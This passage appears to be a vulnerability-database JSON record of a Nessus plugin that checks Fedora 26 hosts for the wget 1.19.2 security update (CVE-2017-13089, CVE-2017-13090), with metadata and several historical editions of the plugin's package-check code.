{"id": "FEDORA_2017-F0B3231763.NASL", "bulletinFamily": "scanner", "title": "Fedora 26 : wget (2017-f0b3231763)", "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2017-11-08T00:00:00", "modified": "2018-02-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "reporter": "Tenable", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "type": "nessus", "lastseen": "2018-09-01T23:53:11", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "e76fa73732945a260b2c26a7f73fa52580cc525d09870dce747a055afb8cc00c", "hashmap": [{"hash": "ada99a85a22bbcb4af166b40440e0a4c", "key": "references"}, {"hash": "0c49659962d34669cce2ef13d33180d4", "key": "sourceData"}, {"hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7f9bdd2b409c9bc14cc0b2cca6553247", "key": "pluginID"}, {"hash": "a0e9f1cac5ee28958e21cdbbfc6ea938", "key": "description"}, {"hash": "c09912b70625e497f66d769f2bb6ba80", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d20ef5c4d89f5885abcc7f2eab461c9c", "key": "cvelist"}, {"hash": "c5813c86deb437665ba4de345462cb8b", "key": "title"}, {"hash": "e5ea4e133fdd22d0dad25dd00662de7f", "key": "modified"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "id": "FEDORA_2017-F0B3231763.NASL", "lastseen": "2018-08-30T19:47:38", "modified": "2018-02-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "104452", "published": "2017-11-08T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.3 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:59:06 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "title": "Fedora 26 : wget (2017-f0b3231763)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:47:38"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "86f56f3d7a8c641f9dae2253cfd0a87f19f3886de388efef9518692a7c099a28", "hashmap": [{"hash": "ada99a85a22bbcb4af166b40440e0a4c", "key": "references"}, {"hash": "322e058cd57621c922ef4e690d6456c0", "key": "sourceData"}, {"hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7f9bdd2b409c9bc14cc0b2cca6553247", "key": "pluginID"}, {"hash": "a0e9f1cac5ee28958e21cdbbfc6ea938", "key": "description"}, {"hash": "c09912b70625e497f66d769f2bb6ba80", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d20ef5c4d89f5885abcc7f2eab461c9c", "key": "cvelist"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "modified"}, {"hash": "c5813c86deb437665ba4de345462cb8b", "key": "title"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "id": "FEDORA_2017-F0B3231763.NASL", "lastseen": "2017-11-08T22:44:57", "modified": "2017-11-08T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "104452", "published": "2017-11-08T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/11/08 14:53:53 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "title": "Fedora 26 : wget (2017-f0b3231763)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2017-11-08T22:44:57"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {}, "hash": "a3fe9f3b86d162fe3234f4acd6e60446f931acca4b9d7f095aaf18b396f315d1", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "ada99a85a22bbcb4af166b40440e0a4c", "key": "references"}, {"hash": "322e058cd57621c922ef4e690d6456c0", "key": "sourceData"}, {"hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7f9bdd2b409c9bc14cc0b2cca6553247", "key": "pluginID"}, {"hash": "a0e9f1cac5ee28958e21cdbbfc6ea938", "key": "description"}, {"hash": "c09912b70625e497f66d769f2bb6ba80", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d20ef5c4d89f5885abcc7f2eab461c9c", "key": "cvelist"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "modified"}, {"hash": "c5813c86deb437665ba4de345462cb8b", "key": "title"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "id": "FEDORA_2017-F0B3231763.NASL", "lastseen": "2017-11-18T12:43:56", "modified": "2017-11-08T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "104452", "published": "2017-11-08T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/11/08 14:53:53 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "title": "Fedora 26 : wget (2017-f0b3231763)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-11-18T12:43:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"modified": "2017-11-21T07:28:51", "value": 9.3}}, "hash": "f53d30a7bb7b8aa43f47d4dfdc1a9398a94fb05a25763412872ac6f6ef58eb75", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "ada99a85a22bbcb4af166b40440e0a4c", "key": "references"}, {"hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7f9bdd2b409c9bc14cc0b2cca6553247", "key": "pluginID"}, {"hash": "a0e9f1cac5ee28958e21cdbbfc6ea938", "key": "description"}, {"hash": "c09912b70625e497f66d769f2bb6ba80", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8dc818ca4840378d6f8a5ca15bb151b9", "key": "modified"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d20ef5c4d89f5885abcc7f2eab461c9c", "key": "cvelist"}, {"hash": "c5813c86deb437665ba4de345462cb8b", "key": "title"}, {"hash": "d537e39ea91b5b48b24279552984fef0", "key": "sourceData"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "id": "FEDORA_2017-F0B3231763.NASL", "lastseen": "2017-11-21T07:28:51", "modified": "2017-11-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "104452", "published": "2017-11-08T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/11/20 17:24:42 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"wget-1.19.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "title": "Fedora 26 : wget (2017-f0b3231763)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-11-21T07:28:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:wget", "cpe:/o:fedoraproject:fedora:26"], "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "5ac666295948bc464a281d1c9724a1f41f533a151af80e2abddfa2fa4a6cd6fd", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "ada99a85a22bbcb4af166b40440e0a4c", "key": "references"}, {"hash": "0c49659962d34669cce2ef13d33180d4", "key": "sourceData"}, {"hash": "ae7e62b5eaeca50145d2c55cc9e1b8bb", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7f9bdd2b409c9bc14cc0b2cca6553247", "key": "pluginID"}, {"hash": "a0e9f1cac5ee28958e21cdbbfc6ea938", "key": "description"}, {"hash": "c09912b70625e497f66d769f2bb6ba80", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d20ef5c4d89f5885abcc7f2eab461c9c", "key": "cvelist"}, {"hash": "c5813c86deb437665ba4de345462cb8b", "key": "title"}, {"hash": "e5ea4e133fdd22d0dad25dd00662de7f", "key": "modified"}, {"hash": "3dac0ffc80a5d37a95ccdf97e777628f", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104452", "id": "FEDORA_2017-F0B3231763.NASL", "lastseen": "2018-02-04T11:06:06", "modified": "2018-02-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "104452", "published": "2017-11-08T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f0b3231763.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104452);\n script_version(\"$Revision: 3.3 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:59:06 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"FEDORA\", value:\"2017-f0b3231763\");\n\n script_name(english:\"Fedora 26 : wget (2017-f0b3231763)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release with CVE fixes\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f0b3231763\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 